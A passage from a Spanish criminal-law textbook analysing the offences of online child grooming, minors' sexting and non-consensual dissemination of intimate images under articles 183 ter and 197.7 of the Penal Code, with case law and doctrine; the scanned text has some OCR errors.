Este precepto fue introducido por la LO 5/2010, debido a la necesidad


de castigar penalmente a quien, a través de medios telemáticos, trate de ga-
narse la confianza de menores con el fin de concertar encuentros para ob-
tener concesiones de índole sexual (MAGRO SERVET, 2010). La expresión pro-
viene, en realidad, de la idea de preparación, embaucamiento o seducción
de niños para cometer actos sexuales (CuGAT MAURI, 2014; GóRRIZ RoYo, 2016).
Posteriormente, la reforma operada por la LO 1/2015 modificaría este ciber-
delito, introduciendo una segunda conducta penalizada: la de un adulto que,
a través de Internet, del teléfono o de cualquier otra TIC contacte con un me-
nor de dieciséis años y realice actos dirigidos a embaucarle para que le faci-
lite material pornográfico o le muestre imágenes pornográficas en las que se
represente o aparezca un menor.
Se trata, por tanto, de dos conductas delictivas separadas, aunque regu-
ladas conjuntamente en el art. 183 ter CP y que, con frecuencia, pueden con-
currir en la práctica: el ciberacoso sexual a menores (child grooming stricto
sensu) y una modalidad de sexting específica. Suponen un adelantamiento de
las barreras de protección penales, castigando como delitos autónomos lo
que, materialmente, son actos preparatorios para la comisión de otros delitos
sexuales (arts. 183 y 189 CP).
Así, según la jurisprudencia, ambas conductas ilícitas tienen una naturaleza
de delito de peligro y de mera actividad, dado que se configuran no atendiendo a la
lesión efectiva del bien jurídico protegido, sino a un comportamiento peligroso para
dicho bien (STS 692/2017, de 22 de febrero). Si estamos ante un delito de peligro
abstracto puede ser discutible (RAMOS VAZQUEZ, 2011; P ÉREZ F ERRER, 2012; GóRRIZ Rovo,
2016). En cuanto que el delito exige la existencia real de un menor y la de actos ma-
teriales encaminados al acercamiento, la tesis del peligro concreto, que exige una
cercanía con la posible lesión del bien jurídico, parece la acertada.

Siempre que estos actos encaminados al acercamiento o a la obtención


de pornografía infantil se lleven a cabo, el delito quedaría consumado. Por el
contrario, es difícil su ejecución en grado de tentativa, por su naturaleza de
consumación anticipada.
Ambas modalidades protegen la indemnidad sexual del menor de die-
ciséis años, esto es, su libertad sexual "pasiva" o "negativa", entendida como

- 235 -
Cibercriminalidad.
Tercera parte. LOS CIBERCIÚM.ENES EN PARTICULAR

el derecho de toda persona a no ser perturbado en su esfera sexual (intan-


gibilidad sexual), pueda o no dar su consentimiento válido por razones de
madurez; pero también la formación y desarrollo de la personalidad y sexua-
lidad del menor. La indemnidad sexual del menor habrá que entenderla en su
sentido más pleno de contenido, pues no solo pretende preservar el derecho
a su pleno desarrollo, formación y socialización del menor, así corno su liber-
tad sexual futura, sino también su integridad moral por lo que el ciberacoso
sexual supone de "cosificación" del menor.
Incluso, se ha pretendido conceder al art. 183 ter CP la protección de un bien
jurídico supraindividual o colectivo denominado "seguridad de la infancia" (D01z
LAGO, 2010, 2011, 2016 y 2018). No obstante, según ha referido nuestra reciente
jurisprudencia, la atribución de tal bien jurídico autónomo a este delito de peligro
se contradice notablemente con la descripción fáctica que contiene el referido pre-
cepto (STS 109 /2017, de 22 febrero) .

Además de proteger el ámbito de la sexualidad del menor, el art. 183 ter


segundo párrafo del Código penal también protege la intimidad personal del
menor, consagrada en el art. 18.1 CE. Ello es así porque, más allá del agravio a
su libertad e indemnidad sexual, las imágenes de contenido pornográfico que
facilitare motu proprio pueden ser compartidas sin su expreso consentimien-
to con terceros.
En este último caso, el sujeto incurrirá en otros delitos. Como veremos a con-
tinuación, no solamente estaremos ante un delito de distribución de pornografía in-
fantil, sino que, además, se estará vulnerando uno de los espacios más reservados
de la intimidad del menor que ha consentido en el envío de esas imágenes o videos.

Pasemos ahora a analizar cada una de las modalidades delictivas que


presenta el delito de child grooming del art. 183 ter del Código penal tras la
reforma de 2015.
i. Ciberacoso sexual a menores de dieciséis años:
La conducta consiste en contactar con un menor de dieciséis años a tra-
vés de Internet, del teléfono o de cualquier otra TIC y proponerle concertar
un encuentro a fin de cometer cualquiera de los delitos descritos en los arts.
178 a 183 y 189 CP (agresiones y abusos sexuales, corrupción de menores y
pornografía infantil), siempre que tal propuesta se acompañe de actos mate-
riales encaminados al acercamiento. Se trata de acciones realizadas delibera-
damente con el fin de establecer una relación y un control emocional sobre
un menor con el fin de preparar el terreno para el abuso o agresión sexual del
menor (STS 97 /2015, de 24 febrero).
El child grooming es compatible con la comisión de otros delitos sexuales: se-
gún el Acuerdo del Pleno no jurisdiccional del TS, de 8 noviembre 2017, el delito

- 236 -
Capitulo 6. CIBERCIÚMENll N NTI AMPLIO

de ciberacoso sexual infantil, puede conformar un concurso real de delitos con las
conductas contempladas en los arts. 183 y 189 CP.

Todos estos elementos han de ser abarcados por el dolo o intención del
autor. Este dolo puede ser directo, si el sujeto actuante es consciente de la
edad del menor; pero, también, eventual, en aquellos casos en los que no se
sabe con certeza la edad, pero exista una alta probabilidad de que lo sea (ra-
cional presunción) y, aun así, le resulte indiferente al autor, de manera que
prefiera continuar con la ejecución de su conducta, aceptando o consintiendo
tal posibilidad.
Lo cierto es que, cuando el autor desconoce en detalle uno de los elementos
del delito, tiene razones para dudar y, además, tiene a su alcance la opción entre
desvelar su existencia preguntando al menor, realizando actos de verificación, etc.,
o simplemente prescindir de la acción, la pasividad seguida de la ejecución de la
conducta no puede ser valorada como una ignorancia sobre ese elemento esencial
del delito (error de tipo), sino como dolo eventual. El desconocimiento de la edad,
como argumento cognoscitivo de defensa, ha de ser probado por quien alega tal ex-
culpación, sobre la base de que se trata de una circunstancia excepcional que ha de
quedar acreditada como el hecho enjuiciado (STS 109/2017, de 22 febrero) .

Ej.: 6.1. Nuestros jueces y tribunales han utilizado diversos argu-


mentos para enfrentarse a una posible exoneración de responsabilidad
penal por un presunto desconocimiento de la edad de la víctima. Así, por
ejemplo, cuando comparece un menor en la vista oral del juicio, apreciar
que presente un aspecto marcadamente "aniñado", de tal forma que repre-
sente la edad que tiene; pero normalmente la decisión no se fundamenta
principalmente en la apariencia física del o la menor, sino llUe se basa en
las propias manifestaciones realizadas por él o ella, por el contenido de las
conversaciones, etc. (STS 527 /2015, de 22 septiembre) .

El contacto tiene que ser por medio tecnológico. El precepto se refiere


concretamente a Internet, teléfono o cualquier otra TIC, expresión esta última
que convierte el listado en abierto, dando cabida a cualesquiera otros meca-
nismos o sistemas de transmisión de datos que no precisen conexión a Inter-
net o a una línea telefónica como, por ejemplo, conexión en red mediante Wi-
Fi o Ethernet, aplicaciones basadas en Bluetooth u otros sistemas que puedan
desarrollarse en el futuro.
El nuevo tipo de pederasta virtual (Grt Rumo, 2008) busca a su víctima
menor por esta vía, visitando espacios personales o chats a los que acuden los
menores y adolescentes, seleccionan a su víctima, se ganan progresivamente
su confianza y, de este modo, consiguen el contacto personal con ellos y lle-
var a cabo el abuso, o consiguen fotos pornográficas de ellos (SAP Tarragona
135/2015, de 8 abril).

- 237 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

La exigencia de que la relación se desarrolle por medios tecnológicos pa-


rece descartar la aplicación a supuestos en los que la relación se desarrolle en
un espacio real, es decir, mediante el contacto físico entre el delincuente y la
víctima, que serán castigados mediante los delitos sexuales tradicionales. Sin
embargo, puede darse un contacto directo personal inicial que se prolongue
por medios tecnológicos, lo que permitiría la realización del delito, dado que
no se especifica si ese contacto es el inicial o derivado. Por ello, nuestra juris-
prudencia ha indicado que si lo que se pretende es castigar estas conductas
por la facilidad que supone la utilización de medios tecnológicos para captar
al menor, esa captación no se agota con los contactos iniciales, por lo que sería
aplicable el delito al que, tras unos contactos iniciales personales, prosigue la
captación del menor por medios tecnológicos (STS 97 /2015, de 24 febrero) .
Ej.: 6.2. Este proceso de ganarse la confianza del menor a través de los me-
dios tecnológicos puede comenzar con un contacto real en el mundo físico. Es ha-
bitual que el acosador sea un conocido del menor que tenga acceso a él físicamen-
te. Por ejemplo, puede ser un profesor~ monitor, uno ele los padres de otro menor
con el que va al colegio o un familiar conocido por el menor (VJLLACAMPA EsTIARTE
& GóMEZ AmnóN, 2016). De hecho, según algunos autores, el modus operandi más
común de grooming procede de conocidos u otros menores, lo que contradice
abiertamente aquella concepción del autor como predatol'y stranger (GóRRIZ Rovo,
2016). Una vez que se ha contactado físicamente con el menor, el resto del acoso
se producirá en el ciberespacio donde las posibilidades de impunidad son mayo -
res . Se produce, de este modo, una interrelación entre el mundo físico y el viI1ual.

En cuanto a la proposición, basta para considerar consumada esta mo-


dalidad según el precepto con que tal propuesta se acompañe de actos mate-
riales encaminados al acercamiento. Esta previsión ha dado lugar a una dis-
cusión. Según la jurisprudencia la consumación del delito se produciría por
la mera concertación de una cita, sin que sea necesaria la aceptación de la
misma y, menos aún, su verificación. Basta, según la jurisprudencia, que se
desarrollen actos con la finalidad de llevar a cabo el encuentro (SSAP Can-
tabria 432/2017 de 18 diciembre, Madrid, 716/2018 de 12 diciembre, SAP
Ourense 373/2013, de 4 octubre). El legislador extiende la punibilidad a la
mera "toma de contacto" con pretensiones de carácter sexual, a través de me-
dios tecnológicos, siempre que, además, tal oferta vaya acompañada de actos
materiales encaminados al acercamiento (SSAP Barcelona 1055/2014 de 22
diciembre; Castellón 142/2015, de 31 marzo). Interpretación esta que no es
compartida por una parte de la doctrina, al considerar que la exigencia de
actos materiales encaminados al acercamiento que deben acompañar a la
propuesta no puede desvincularse de la propia propuesta, de manera que la
consumación se conseguirá cuando la cita propuesta por el delincuente fue-

- 238 -
Capitulo 6. CIBERCRÍMENES EN SENTIDO AMPLIO

se aceptada por el menor y se inician actos encaminados a que se ejercite la


misma.
Además de si es necesaria o no la aceptación de la víctima, el problema
se plantea en la interpretación de lo que son los actos materiales de acerca-
miento. El legislador solo ha concretado en cuanto a la naturaleza del acto
que tiene que ser material, no meramente formal, así como que su finalidad
esté encaminada al acercamiento. Estamos ante un numerus apertus de actos
que el legislador no ha querido acotar en función de las ilimitadas formas de
realizarlos. En todo caso, el contacto al que se refiere el precepto y a cuya con-
secución deben encaminarse los actos materiales, es un encuentro o contacto
físico, en el mundo real, encaminado a cometer un delito sexual sobre el me-
nor. La discusión a partir de ahí se centra en si los actos materiales encamina-
dos al acercamiento deben darse o no en el mundo físico. Consideramos más
acertada la primera opción.
Será preciso discernir si la exigencia de que los actos sean "materiales" impli-
ca que los mismos deban necesariamente repercutir y reflejarse más allá del mundo
digital. En este sentido, parece decantarse la interpretación del precepto que se ha
hecho por parte de la doctrina: en el sentido de movimiento físico, del ciberacosa-
dor o de la víctima, a fin de conseguir el encuentro (VtLLACAMPA EsTIARTE, 2014 y 2015;
GóRRIZ Rovo, 2016) . Ahora bien, otro sector considera que si el legislador ha tornado
el término material como opuesto al espiritual y tendrían cabida en este concepto
actos digitales que no tengan repercusión física. Así, considerados los actos digitales
exigidos por el delito como "encaminados al acercamiento", no se distinguirían de
los actos digitales a través de los que se ha desarrollado la relación o los que se ha-
yan realizado para formular la propuesta de encuentro, si se entiende que los actos
deben ser ejecutados para que tal encuentro tenga lugar (SSTS 823/2015 de 23 de
diciembre y 517 /2015, de 22 de septiembre).

Ej.: 6.3 . Cuando el encuentro se ha producido no nos encontramos


con los problemas de delimitación y prueba de los actos materiales de
acercamiento: en la STS 199/2017 de 27 de marzo, el delincuente consi-
gue una cita con la menor (que se llevó a efecto) "cumpliendo así la exi-
gencia última del tipo relativa a los actos materiales de acercami ento, que
en este caso se llevó efectivamente a cabo"; en la STS 109 / 2017, de 22
de febrero , el acusado contacta con la menor en un hostal donde tienen
relaciones sexuales; en la SAP Zaragoza, de 13 de septiembre de 2017, dos
menores acuden a un bar donde se encuentra el abusador tanto antes ele
los mensajes como posteriormente; en la SAP Vizcaya, 7 de abril ele 2017,
se concertaron tres citas con un menor. aunque en una no llegó a produ -
cirse el encuentro; en las SSAP Albacete, 22 de septiembre 2015 y Jaén,
11 mayo de 2015, el acercamiento llega hasta la existencia de relaciones
sexuales. Sin embargo, si no ha sido así, cabe plantearse si, por ejemplo,
el hecho de ofrecerle dinero o compensaciones para conseguir el contacto

- 239 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

es suficiente para considerarse como "acto material de acercamiento": en


la SAP Madrid, 14 de junio 2017, el acusado obsequió repetidam ente a la
menor con golosinas y artículos de papelería y llegó a acudir a las inme-
diaciones de su domicilio a entregárselas y, posteriormente, tras una con-
t inuada comunicación telemática audiovisual, fue sorprendido intentando
acceder a la urbanización en que se encontraba la menor.
En cambio, las meras aspiraciones de tipo sexual que pudieran infe-
rirse del texto de los mensajes enviados por el sujeto, sin que conste que
se propusiera a los menores encuentros en los que hacer realidad el con-
tenido a que aluden o fueran guiados con fines sexuales, no cumple con las
exigencias del delito (SAP Valladolid, 84/2017 de 7 marzo).

Estamos, por tanto, ante un tipo penal mixto cumulativo, en el que se


recoge una pluralidad de conductas dispuestas en un triple escalonamiento
que configura un proceso dinámico: contactar, concertar y acercarse (STS
109/2017, de 22 febrero; PANIZO GALENDE, 2011; GóRRIZ ROYO, 2016).
No resulta imprescindible que llegue a existir contacto sexual, ni siquie-
ra que el menor y el sujeto lleguen a conocerse en persona, sino que el delito
se entiende consumado cuando, tras haber contactado con el menor y haber-
le propuesto una cita, el sujeto realice un acercamiento físico (SAP Barcelona,
22 de diciembre de 2014).
Como conclusión de lo expuesto:
Se viene exigiendo algún acto material de acercamiento entendido
como una acción que vaya más allá del simple contacto virtual y del
deseo unilateral del mayor de edad no correspondido.
La necesidad de un contacto o comunicación real entre emisor y
receptor es lo que diferencia este ilícito de otros delitos como el
cyberstalking, previsto en el nuevo art. 172 ter CP (DE LEMUS VARA,
2015).
El acercamiento lo podrá efectuar el responsable o el menor (o am-
bos, no se exige que el cibercriminal sea quien inicia el contacto;
STS 199 /2017, de 27 marzo) pero debe ser un acto físico, más allá
de un intento digital o virtual, más allá de una propuesta unilate-
ral sin ninguna contestación o aceptación o siquiera respuesta de la
contraparte (SAP Cantabria 432/2017, de 18 diciembre).
Como ya se ha mencionado, a pesar de las dudas de la doctrina, el
precepto no exige aceptación de la propuesta de encuentro.
Una versión más amplia del delito, en cambio, entiende que el propósi-
to normativo a que responde la exigencia de concurrencia de actos materiales

- 240 -
Capítulo 6. CIBERCIÚMENES EN SENTIDO AMPLIO

encaminados al acercamiento está ligado a la constatación de la seriedad de la


proposición; o, dicho de otro modo, se trata de descartar la punición de proposi-
ciones poco serias (SAP de Orense 04.10.2013). Aquí, en cambio, optaremos por
la versión estricta que exige, además de la propuesta seria, actos materiales, en
el mundo físico dirigidos al encuentro real con el menor. La desventaja de esta
opción desde una perspectiva criminológica es que no englobaría a los supues-
tos de groomers "asociales", que encuentren en los nuevos avances de las tecno-
logías de la comunicación un modo de relacionarse sin necesidad de contacto
físico. No obstante, en casos de relaciones sexuales online sin contacto físico con
menores, podrá acudirse a otros delitos sexuales (CuGAT ~uru, 2014).

El principal problema para la persecución de este delito radica proba-


blemente en la prueba del ánimo o finalidad del sujeto activo del delito, dado
que se trata de un aspecto interno o subjetivo, debiendo acudirse a la prueba
de indicios o al juicio de inferencia (por ejemplo, teniendo en cuenta el con-
texto y tono de los mensajes), salvo confesión expresa del acusado (SAP Bar-
celona 1055/2014 de 22 diciembre).
Ej. 6.4: En la Sentencia de Juzgado de Menores N.º 1 de Ourense, de 13 ele
mayo ele 2013, dos menores se conocen a través de una red social, intercambian-
do sus teléfonos, y comenzando el acusado a remitir mensajes por WhatsApp en
los que propone a la menor encuentros físicos, remitiendo mensajes de contenido
sexual explícito. El envío de estos mensajes se entendió como una clara referencia
a su intención de cometer un delito sexual co ntra la meno1; es decir, como actos
materiales de acercamiento (erróneamente según D1Az CORTES, 2014).

Para lograr salvar los problemas de prueba en casos de evidencias digi-


tales, la denuncia debe ser realizada a ser posible desde el primer momento
o ampliada con posterioridad por un agente especializado en investigación
tecnológica, que debe también analizar el ordenador de la víctima en busca
de cualquier vestigio. Es muy importante poder mantener una entrevista re-
servada con el menor sin presencia de los padres, para lo cual se requiere
lógicamente recabar su autorización. El menor puede ocultar a sus padres al-
gunos detalles del caso para lo cual es importante que se entable una relación
de confianza entre el menor y el investigador, para que éste pueda conocer
todos los pormenores del caso. Se propone la figura del agente encubierto en
Internet como medio de investigación (PANJZO GALANDE, 2011).

ii. El tipo agravado


Cabe distinguir la mera proposición, de aquella obtenida mediante coac-
ción, intimidación, engaño o chantaje. En estos últimos supuestos, la pena
se agrava por el mayor desvalor social de la conducta. De hecho, como ya se

- 241 -
Cibercriminalidad.
Tercera parte. LOS CIBERCR.ÍMENES EN PARTICULAR

ha comentado, es habitual que una conducta lleve a la otra, haciendo que el


-o la- menor envíe fotografías en actitud sexual para, más tarde, chantajear-
lo para conseguir el acercamiento bajo la amenaza de revelar algún tipo de
información o imagen comprometida que, previamente, se ha obtenido me-
diante la manipulación y el engaño gracias a la utilización de un medio in-
formático (chat, redes sociales, etc.). A esta conducta habitualmente se la co-
noce con la denominación anglosajona sextorsión, es decir, casos de abusos
sexuales por Internet sin consentimiento de las víctimas y con el empleo de la
amenaza de divulgar imágenes o videos de las víctimas (extorsión o chantaje
sexual).
En realidad, la sextorsion está relacionada con el delito de sexting tanto del art.
183 ter segundo párrafo, como del art. 197.7 CP que analizaremos a continuación, si
se difunden las imágenes, con la agravante de que éstas se obtuvieron sin consenti-
miento, lo que nos llevaría al art. 197.3 CP.

iii. Sexting específico de menores


El art. 183 ter.2 CP se recoge una conducta específica de sexting, con-
sistente en el envío de mensajes, videos o fotografías sexualmente explícitas
por parte del menor embaucado y que constituye un serio peligro para su
bienestar psíquico, desarrollo y formación. Figura esta que, para un sector
doctrinal, no deja de ser más que una tentativa del delito de pornografía de
menores del art. 189 CP (STS 158/2019, de 26 marzo).
Con carácter general, no referido en especial a los menores, "la doctrina
y la jurisprudencia suelen cifrar la condición pornográfica de una conducta
o de un material en los siguientes requisitos: a) que el mismo consista o re-
presente obscenidades cuya única finalidad sea excitar el instinto sexual; b)
que dicha obscenidad exceda claramente el erotismo que tengan por admi-
sible las convenciones sociales de cada lugar y momento; y, c) que, si se tra-
ta de una obra, carezca de justificación científica, literaria o artística" (STS
174/2017, de 21 marzo). Por otra parte, el Protocolo Facultativo de la Con-
vención sobre los Derechos del Niño indica que por pornografía infantil se
entiende toda representación por cualquier medio, de un niño dedicado a ac-
tividades sexuales explícitas, reales o simuladas, o toda representación de las
partes genitales de un niño con fines primordialmente sexuales.
De este modo las fotografías de niños mostrando sus órganos genitales
integran el concepto de pornografía infantil, elemento normativo del tipo
(STS 796/2007, 1 de octubre; STS 174/2017, de 21 de marzo).

- 242 -
Capitulo 6. CIBERCIÚMENES EN SENTIDO AMPLIO

Ahora bien, quedaría descartada una petición de una simple foto sin un
explícito contenido sexual, pues lo que se sanciona es conseguir una foto por-
nográfica de un menor, por lo que no bastaría tampoco, según algunas senten-
cias, con la fotografía del simple desnudo de un menor (STS de 08.03.2006),
siendo necesario, al menos, la petición de mostrar los órganos genitales del
menor o la exigencia de poses eróticas para que la conducta sea delictiva
(SAP Sevilla 423/2018, de 31 julio).
Existen resoluciones jurisprudenciales reticentes a condenar por este delito
específico de sexting cuando se trata de una fotografía del simple desnudo de un me-
nor. Se dará el delito, en cambio, cuando se pretenda la obtención de una foto para
su utilización con fin pornográfico, esto es, la foto debería ser incluida dentro de las
pornográficas, que implica, una inherente conducta sexual explicita, entendiéndose
como tal, acceso carnal en todas las modalidades, la masturbación, zoofilia o prác-
ticas sadomasoquista, pero no un simple desnudo. Se exige, al menos, la petición de
mostrar los órganos genitales del menor o la exigencia de poses eróticas para que la
acción sea delictiva.
También es interesante consultar la Circular 2/2015 de la Fiscalla General del
Estado, sobre los delitos de pornografía infantil tras la reforma operada por la Ley
1/2015. En ella se especifica que "el concepto de material pornográfico infantil de-
ben manejarse los informes explicativos de los Convenios de Budapest y de Lanza-
rote, para los que las conductas sexualmente explícitas deben abarcar al menos los
siguientes actos reales o simulados: a) relaciones sexuales, incluyendo genital-geni-
tal, oral-genital, anal-genital u oral-anal entre niños o entre un adulto y un niño, del
mismo o de distintos sexos b) bestialismo c) masturbación d) abusos sádicos o ma-
soquistas en un contexto sexual o e) exhibición lasciva de genitales o del área púbica
de un niño. No es relevante si la conducta representada es real o simulada". También
incluye la "pornografía técnica", que utiliza adultos que parecen ser menores y la
"pornografía virtual" aquella en la que la imagen del menor es una creación artificial
pero realista, elaborada por ordenador u otro medio. Pero excluye del concepto de
"realista" dibujos animados, manga o representaciones similares.

Embaucar significa "engañar o alucinar, prevaliéndose la inexperiencia


o candor del engañado", esto es, actuar con fraude o malicia aprovechándose
de la ingenuidad o inexperiencia sexual de un menor de edad (SAP Cantabria
432/2017, de 18 diciembre). Se descarta la comisión del delito de sexting es-
pecífico cuando no existe ardid alguno por parte del sujeto activo (SAP Cas-
tellón 106/2019, de 20 marzo), sin perjuicio de los delitos sexuales contra
menores que pudieran darse por otras vías.

1.2. Sexting (art.197.7CP)


El fenómeno denominado sexting se dio a conocer mediáticamente en
nuestro país a raíz de un suceso ocurrido en el año 2012, en el que una mujer
envió voluntariamente a su expareja una grabación de vídeo en la que apa-

- 243 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

recía masturbándose, grabación que aquél reenvió a otras personas sin el


consentimiento de ella (Caso Olvido Hormigos). El sexting, supone el envío
de imágenes estáticas (fotografías) o dinámicas (vídeos) de contenido sexual,
con mayor o menor carga erótica, entre personas que voluntariamente con-
sienten en ello, formando parte de su actividad sexual que se desarrolla de
manera libre (SSAP Granada 351/2014, de 5 junio y 486/2014, de 18 sep-
tiembre).
El art. 197.7 CP regula por primera vez el delito de sexting entre los ati-
nentes al descubrimiento y revelación de secretos mediante difusión de imá-
genes o grabaciones de carácter íntimo: la conducta típica consiste en difun-
dir, revelar o ceder a terceros -aquellas personas ajenas al círculo íntimo en el
que se han obtenido las imágenes- las referidas imágenes sin la autorización
de la persona afectada. Al exigirse un componente de "gravedad", es necesa-
rio valorar que la difusión pueda provocar una seria injerencia en el ámbito
personal de intimidad del afectado (bien jurídico protegido).
Lo que caracteriza a esta conducta es que las imágenes/grabaciones
(hay que entender tanto los contenidos perceptibles únicamente por la vista,
como los que se captan conjuntamente por el oído y la vista y también aque-
llos otros que, aun no mediando imágenes, pueden percibirse por el sentido
auditivo) se obtienen con la anuencia de la persona afectada, sobre la base,
generalmente, de una relación de confianza, disponiéndose después de ellas,
en perjuicio de la víctima, muchas veces por motivos de venganza o despecho
(Circular 3/2017 de la Fiscalía General del Estado, sobre la reforma del códi-
go penal operada por la LO 1/2015, de 30 de marzo, en relación con los de-
litos de descubrimiento y revelación de secretos y los delitos de daños infor-
máticos). Las imágenes o vídeos pueden ser reenviados a terceros o subidas a
las redes sociales, en ocasiones mediante la creación de perfiles falsos, lo que
supone una mayor difusión y publicidad de estas en Internet. Emparentado
con el sexting, y dentro de las conductas sancionables por el art. 197. 7 CP, se
encuentra el llamado sex-casting que consiste en la grabación de contenidos
sexuales a través de la webcam con el consentimiento de la víctima y difusión
de los mismos ya sin su consentimiento por e-mail, redes sociales o TIC (PÉREZ
D1Az, 2017).
A diferencia del sexting específico para menores de edad, en este caso el
embaucamiento o engaño es irrelevante, puesto que las imágenes son envia-
das motu proprio entre adultos con plena capacidad de consentimiento. Ade-
más, como ya se ha expuesto, en el caso del sexting específico para menores el
mero acto de solicitud de fotografías o videos pornográficos ya se considera
delictivo en sí mismo, mientras que en el sexting del art. 197. 7 CP este acto

- 244 -
Capítulo 6. CIBERCIÚMENES EN SENTIDO AMPLIO

entre adultos sería impune, castigándose solamente la posterior difusión, re-


velación o cesión no consentida de esas imágenes.
La falta de consentimiento en la difusión es clave en esta modalidad de
sexting. La declaración de la víctima constituirá, sin duda, un elemento proba-
torio esencial. En cualquier caso, no resultará necesario acreditar una negati-
va expresa, sino que podrá ser bastante con la no constancia de autorización,
situación a la que han de equipararse los supuestos de falta de conocimiento
por parte del afectado de la ulterior cesión o distribución.
Otra diferencia fundamental es que el sexting del art. 197.7 CP no solo
incluye imágenes o grabaciones íntimas de carácter sexual, sino también
aquellas que puedan menoscabar la dignidad de la persona (MARTfm:z ÜTE-
Ro, 2013). La dicción del artículo patentiza que cualquier actividad íntima o
reservada puede calificarse como secreto, siempre que se pretenda que no
trascienda a terceros. Esto significa que la propia víctima debería tener cierta
reserva, pues no es secreto lo que es de dominio público o lo que no se pro-
tege con la debida reserva (autoprotección de la intimidad). En este sentido,
la pretérita jurisprudencia del TC y el TS adoptaron la tesis de la "intimidad
compartida" o el "despojo de la intimidad", indicando que necesariamente
conducía a la pérdida de dominio sobre la información e, inevitablemente,
a un riesgo que se debía asumir: lo que se ha compartido con otro ya no es
controlable por aquél que transmitió la información. Tal doctrina no puede
ser aceptada en todos los casos, pues habrá que diferenciar hasta dónde llega
el consentimiento y hasta cuándo se produce (LLORIA GARcfA, 2013). Una de las
particularidades del sexting es, precisamente, la brecha en la autoprotección
de la víctima, quien voluntariamente facilita las imágenes al sentirse en un
marco de confianza e intimidad (propio y reservado), que se ve traicionado
con la difusión de las mismas sin su consentimiento.
Conviene recordar que el bien jurídico protegido es la intimidad indivi-
dual, de modo que, aunque la idea de secreto pueda ser más amplia y vincula-
da a los conocimientos solo al alcance de unos pocos, debe conectarse nece-
sariamente con la intimidad o privacidad, pues esa es la finalidad protectora
del tipo (STS 666/2006, de 19 de junio). La protección alcanza, por tanto, la
reserva o ausencia de publicidad sobre la esfera de intimidad de la persona,
lo que se determina necesariamente conforme a parámetros subjetivos (Co-
MES RAGA, 2013). Estamos, en consecuencia, ante un delito de resultado, pues
exige el efectivo menoscabo de la intimidad, que, además, ha de ser grave
(SAP Madrid 515/2018, de 19 julio).
La gravedad de la afectación habrá de valorarse en cada caso concreto en
atención a las circunstancias concurrentes: a partir del contenido mismo de

- 245 -
Cibercriminalidad.
Tercera parte. LOS CIBERCRÍMENES EN PARTICULAR

la grabación, de la situación y condiciones en la que se llevó a efecto e, incluso,


de las propias características personales de la víctima (Circular FGE 3/2017).
De modo subsidiario también pueden entenderse vulnerados los derechos a
la propia imagen y al honor de la persona que aparece en la grabación (MARTí-
NEZ ÜTERO, 2013; FERNÁNDEZ NIETO, 2016).

Se discute si el sexting del art. 197. 7 CP es un delito común, que no re-


quiere ninguna característica especial en el sujeto que lo comete, pudiendo
ser llevado a cabo por cualquier persona o, por el contrario, si estamos ante
un delito especial propio. Teniendo en cuenta la redacción del precepto, pa-
rece que lo más acertado es considerar que se ha configurado como un delito
especial propio del que únicamente serían autores aquellos que, habiendo
obtenido con la anuencia de la víctima la imagen o grabación comprometida
inician, sin autorización del afectado, la cadena de difusión cediendo o dis-
tribuyendo dichos contenidos íntimos a otros ajenos -extranei- a esa inicial
relación con la víctima y a la obtención, por tanto, de la imagen o grabación
comprometida (Circular FGE 3/2017) .
Cuestión distinta es la actuación de los terceros que, sin haber interve-
nido en la acción inicial, reciben en un momento posterior los contenidos
comprometidos y los transmiten a otras personas distintas, conductas estas
que, por mor de las posibilidades que ofrecen las herramientas tecnológicas,
pueden reiterarse indefinidamente por una pluralidad de personas. Dichos
comportamientos, en principio, únicamente podrían dar lugar a la utilización
de los mecanismos previstos en la Ley Orgánica 1/1982, de protección civil del
derecho al honor, a la intimidad personal y familiar y a la propia imagen o, a lo
sumo, incurrir en un delito contra la integridad moral de la víctima (art. 173
CP), si realizan ulteriores transmisiones a terceros de los contenidos compro-
metidos, a sabiendas de que la difusión se está llevando a efecto sin contar
con la autorización del afectado y que la misma, en atención a la especial na-
turaleza de los contenidos y a las circunstancia concurrentes, puede menos-
cabar gravemente su integridad moral.
Nuestra jurisprudencia parece haber adoptado este criterio, indican-
do que la conducta se encuentra referida a la misma persona que obtiene las
imágenes o las grabaciones audiovisuales como autor del delito. Esto sería una
consecuencia necesaria del tenor literal del precepto, pues la palabra anuencia
significa consentimiento, y consentir significa permitir algo. Por tanto, se trata
de una conducta que solo puede ser cometida por aquél que ha obtenido las
imágenes o grabaciones audiovisuales con el consentimiento de la víctima.
En apoyo de tal interpretación cabe añadir, además, que la redacción exige
que las imágenes o grabaciones de la persona afectada se hubieran obtenido "en

- 246 -
Capítulo 6. CIBERCIÚMENES EN SENTIDO AMPLIO

un domicilio o en cualquier otro lugar fuera del alcance de la mirada de terceros",


lo que cierra la posibilidad de que la persona investigada, encausada o acusada
hubiera "obtenido" la grabación mediante la recepción de las imágenes o graba-
ciones en lugar distinto del domicilio de la persona afectada. Y, siendo así, la única
interpretación lógica es la que precisa de la obtención de la imagen o grabación
directamente por el sujeto activo del delito (SSAP Barcelona 302/2017, de 24
abril; Burgos 228/2018, de 15 junio; Madrid 515/2018, de 19 julio).
Por domicilio debe entenderse, de manera amplia y flexible, el ámbito en
que se desarrolla la vida privada de la persona, y para la comisión del delito
es indiferente que se trate del correspondiente a la víctima, al agresor o a un
tercero. Por "lugar fuera del alcance de la mirada de terceros", debe entender-
se cualquier marco espacial, abierto o cerrado, de carácter reservado.
Una de las modalidades comisivas del delito de sexting que pueden en-
contrarse en la práctica es el denominado revenge porn o "porno vengativo"
o difusión de imágenes o grabaciones sexualmente explícitas de la expareja.
Su mayor incidencia es probable que se produzca en el ámbito de la violencia
de género (MAGRO SERVET, 2014), así como en la jurisdicción de menores con la
cada vez más prolífica práctica del sexting (AAP de Córdoba, de 30 de marzo
de 2017; LLORIA GARCfA, 2013). En concreto, en el caso de los menores de edad
algunos estudios han evidenciado que, de forma general, los/as adolescentes
inicialmente no reconocen su participación activa en el sexting, si bien admi-
ten la recepción de esta clase de mensajes con contenido sexual.
Ej.: 6.5. Según algunos estudios (PÉREZ DtAZ, 2017) el 4,1 % de los niños de
11 yl2 años de edad ha recibido mensajes y /o imágenes de contenido sexual a
través de su terminal móvil, frente a un 13,7% de los de 13 yl4 años. Se triplica
entre los 12 y los 13 años, pues el 0,8% de los niños de 11 yl2 años de edad ha
enviado imágenes suyas en posturas inapropiadas a través de su terminal móvil,
